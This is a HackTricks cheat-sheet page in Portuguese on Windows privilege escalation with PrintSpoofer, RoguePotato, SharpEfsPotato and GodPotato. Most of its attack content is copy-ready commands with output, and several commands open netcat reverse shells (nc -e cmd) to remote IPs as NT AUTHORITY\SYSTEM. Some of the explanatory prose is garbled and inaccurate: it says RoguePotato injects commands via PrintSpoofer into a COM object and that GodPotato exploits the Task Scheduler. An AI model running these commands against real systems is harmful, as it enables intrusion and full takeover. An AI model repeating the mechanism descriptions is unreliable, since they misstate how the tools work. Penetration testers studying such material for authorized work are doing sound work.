hacktricks/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md

RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os PLANOS DE ASSINATURA!
• Descubra A Família PEASS, nossa coleção exclusiva de NFTs
• Adquira o swag oficial do PEASS & HackTricks
• Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-me no Twitter 🐦@carlospolopm.
• Compartilhe suas técnicas de hacking enviando PRs para o repositório hacktricks e hacktricks-cloud repo.

{% hint style="warning" %} JuicyPotato não funciona no Windows Server 2019 e no Windows 10 build 1809 em diante. No entanto, PrintSpoofer, RoguePotato, SharpEfsPotato, GodPotato podem ser usados para alavancar os mesmos privilégios e obter acesso de nível NT AUTHORITY\SYSTEM. Este post de blog aprofunda a ferramenta PrintSpoofer, que pode ser usada para abusar dos privilégios de impersonação em hosts Windows 10 e Server 2019 onde o JuicyPotato não funciona mais. {% endhint %}

Demonstração rápida

PrintSpoofer

c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"

--------------------------------------------------------------------------------   

[+] Found privilege: SeImpersonatePrivilege                                        

[+] Named pipe listening...                                                        

[+] CreateProcessAsUser() OK                                                       

NULL

RoguePotato

RoguePotato é uma técnica de escalonamento de privilégios locais que explora uma vulnerabilidade no Windows COM. Essa técnica permite que um usuário com privilégios limitados execute comandos como SYSTEM.

O ataque começa com a criação de um objeto COM arbitrário e a definição de uma propriedade personalizada. Em seguida, o atacante usa o PrintSpoofer para executar um comando como SYSTEM. O PrintSpoofer é uma ferramenta que permite que um usuário execute comandos como SYSTEM usando a vulnerabilidade do Windows Print Spooler.

O PrintSpoofer é usado para injetar um comando malicioso no objeto COM criado anteriormente. Quando o objeto COM é acessado, o comando malicioso é executado como SYSTEM.

Para se proteger contra o RoguePotato, é recomendável desativar o Windows Print Spooler ou restringir o acesso ao objeto COM arbitrário.

c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999

SharpEfsPotato

SharpEfsPotato é uma técnica de escalonamento de privilégios locais que explora uma vulnerabilidade no serviço "EFS" (Encrypting File System) do Windows. Essa técnica é semelhante ao RoguePotato e PrintSpoofer, mas em vez de explorar o serviço "Print Spooler", explora o serviço "EFS". O objetivo é obter privilégios de sistema para executar comandos com privilégios elevados.

SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
  Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

  Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

C:\temp>type C:\temp\w.log
nt authority\system

GodPotato

GodPotato é uma técnica de escalonamento de privilégios locais que explora uma vulnerabilidade no serviço "Task Scheduler" do Windows. Essa técnica permite que um usuário com privilégios limitados execute comandos com privilégios elevados. O GodPotato é uma variação do RoguePotato, que explora a mesma vulnerabilidade, mas usa um método diferente para alcançar o escalonamento de privilégios.

GodPotato -cmd "cmd /c whoami"
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

• Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os PLANOS DE ASSINATURA!
• Descubra A Família PEASS, nossa coleção exclusiva de NFTs
• Adquira o swag oficial do PEASS & HackTricks
• Junte-se ao 💬 grupo do Discord ou ao grupo do telegram ou siga-me no Twitter 🐦@carlospolopm.
• Compartilhe seus truques de hacking enviando PRs para o repositório hacktricks e para o repositório hacktricks-cloud.